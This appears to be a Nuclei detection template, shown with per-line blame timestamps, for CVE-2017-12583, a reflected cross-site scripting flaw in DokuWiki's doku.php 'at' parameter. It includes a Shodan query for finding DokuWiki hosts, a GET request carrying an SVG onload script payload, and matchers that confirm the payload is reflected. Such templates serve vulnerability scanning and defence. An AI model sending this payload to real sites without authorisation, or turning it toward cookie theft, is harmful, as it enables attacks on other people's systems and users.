2022-04-13 07:34:06 +00:00
id : CVE-2017-12583
info :
2022-08-16 14:14:41 +00:00
name : DokuWiki - Cross-Site Scripting
2022-04-13 07:34:06 +00:00
author : DhiyaneshDK
severity : medium
2022-08-16 14:14:41 +00:00
description : DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/splitbrain/dokuwiki/issues/2061
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-12583
2022-04-13 07:34:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-13 07:34:27 +00:00
cve-id : CVE-2017-12583
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.001
cpe : cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.40499
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"DokuWiki"
2023-07-11 19:49:27 +00:00
vendor : dokuwiki
product : dokuwiki
2022-04-14 08:33:28 +00:00
tags : cve,cve2017,xss,dokuwiki
2022-04-13 07:34:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-13 07:34:06 +00:00
- method : GET
path :
2022-04-14 08:44:00 +00:00
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
2022-04-13 07:34:06 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-04-14 08:44:00 +00:00
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
2022-04-13 07:34:06 +00:00
- type : word
part : header
words :
- 'text/html'
- type : status
status :
- 200